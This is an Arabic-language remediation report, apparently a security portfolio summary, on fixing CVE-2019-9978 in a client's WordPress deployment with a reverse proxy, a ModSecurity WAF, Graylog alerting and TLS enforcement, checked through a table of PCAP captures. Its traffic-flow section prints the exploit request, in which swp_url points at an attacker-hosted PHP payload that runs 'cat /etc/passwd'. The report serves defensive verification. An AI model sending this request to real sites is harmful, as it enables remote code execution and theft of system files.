
تقرير المعالجة لنشر MegaQuagga الذي يتحقق من تخفيف CVE-2019-9978 من خلال طبقات دفاعية تقدمية. يوثق إدراج الوكيل العكسي (reverse proxy)، ونشر جدار حماية تطبيقات الويب ModSecurity، وتكامل Graylog SIEM، وفرض SSL/TLS باستخدام تحليل متعدد المراحل لـ Wireshark PCAP عبر واجهات pfSense WAN و LAN.
تقرير المعالجة لنشر MegaQuagga للتحقق من تخفيف CVE-2019-9978 من خلال طبقات دفاعية تدريجية. يوثق إدراج الوكيل العكسي، ونشر ModSecurity WAF، وتكامل Graylog SIEM، وفرض SSL/TLS باستخدام تحليل PCAP متعدد المراحل عبر واجهات WAN و LAN لجدار pfSense.
المحلل: Samuel Weiss المنظمة: 0x2A Security الإصدار: 1.1 (27 أبريل 2026) العميل: MegaQuagga Publishing التصنيف: سري
يوثق هذا المشروع المعالجة النشطة للثغرات التي تم تحديدها أثناء اختبار الاختراق لـ MegaQuagga، مع التركيز بشكل خاص على CVE-2019-9978 (تضمين الملفات عن بعد عبر إضافة social-warfare لووردبريس). تم التحقق من المعالجة من خلال تحليل التقاط الحزم متعدد المراحل باستخدام Wireshark عبر واجهتي WAN و LAN لجدار pfSense، مع تطبيق ضوابط دفاعية تدريجية وإعادة اختبارها في كل مرحلة.
| ملف | الوصف |
|---|---|
_VULN_REMEDIATION__MegaQuagga_Remediation_Report__Samuel_Weiss_.docx | تقرير معالجة كامل يتضمن ملخص تنفيذي والإجراءات المتخذة والأدلة المستندة إلى PCAP على المعالجة والتوصيات المستقبلية |
_VULN_REMEDIATION__PCAP_worksheet__Samuel_Weiss_.xlsx | ورقة عمل تحليل PCAP توثق ملفات التقاط الحزم وتدفق حركة المرور في كل مرحلة معالجة وعناوين IP المصدر/الوجهة والمنافذ وتعليقات تدفق TCP |
تم نشر وكيل عكسي أمام خادم ووردبريس، مما غير بنية الشبكة بحيث لم يعد من الممكن توجيه حركة المرور المباشرة إلى خادم التطبيق الخلفي من الشبكة الخارجية. أكدت أدلة PCAP توجيه حركة المرور عبر طبقة الوكيل.
تم تمكين ModSecurity كطبقة WAF على الوكيل العكسي. عند إعادة تنفيذ استغلال RFI، تم حظر الحمولة الخبيثة swp_url وأعاد الخادم HTTP 403 Forbidden، مما أكد أن قاعدة WAF كانت تعمل على توقيع الاستغلال. تم تأكيد نشاط التنبيه في Graylog SIEM.
تم تكوين Graylog لتوفير تجميع مركزي للسجلات ومراقبة التنبيهات. تم نشر قواعد تنبيه ModSecurity للكشف عن توقيعات استغلال RFI، مما يوفر رؤية فورية لمحاولات الهجوم.
[Attacker] → GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://[attacker]:8000/payload.txt
[WordPress] → GET /payload.txt (fetches attacker-hosted PHP payload)
[Attacker] → Returns: <pre>system('cat /etc/passwd')</pre>
[WordPress] → Returns /etc/passwd contents to attacker ✅ EXPLOIT SUCCESSFUL
[Attacker] → GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=...
[WAF] → HTTP 403 Forbidden ✅ EXPLOIT BLOCKED
[Attacker] → HTTPS only; HTTP port 80 blocked at pfSense WAN
[pfSense] → Exploit payload cannot reach web server ✅ EXPLOIT BLOCKED
تقرير معالجة لنشر MegaQuagga للتحقق من تخفيف CVE-2019-9978 من خلال طبقات دفاعية تدريجية. يوثق إدراج الوكيل العكسي، ونشر ModSecurity WAF، وتكامل Graylog SIEM، وفرض SSL/TLS باستخدام تحليل PCAP متعدد المراحل عبر واجهات WAN و LAN لجدار pfSense.
| الملف | التاريخ | الواجهة | الفلتر | الحزم | المرحلة |
|---|
| Red-Team-1.pcapng | 2025-01-03 | eth0 (Red-Team) | none | 4,013 | خط الأساس قبل المعالجة |
| Red-Team-2.pcapng | 2026-04-22 | eth0 (Red-Team) | none | 26,841 | قبل المعالجة (تم تأكيد الاستغلال) |
| pfSense-WAN-1.pcap | 2026-04-22 | em0 (WAN) | 192.168.100.x | 46 | تم التقاط حركة مرور الاستغلال من جانب WAN |
| pfSense-LAN-1.pcap | 2026-04-23 | em1 (LAN) | 192.168.100.x | 39 | حركة مرور الاستغلال من جانب LAN (قبل الوكيل) |
| pfSense-LAN-2.pcap | 2026-04-23 | em1 (LAN) | port 80/8000 | 45 | بعد إدراج الوكيل العكسي |
| pfSense-LAN-3.pcap | 2026-04-24 | em1 (LAN) | port 80/8000/443 | 1,000 | بعد تمكين WAF (تم تأكيد 403 ممنوع) |
| pfSense-LAN-4.pcap | 2026-04-25 | em1 (LAN) | port 81/8000/443 | 534 | بعد تحميل SSL (تم حظر الاستغلال) |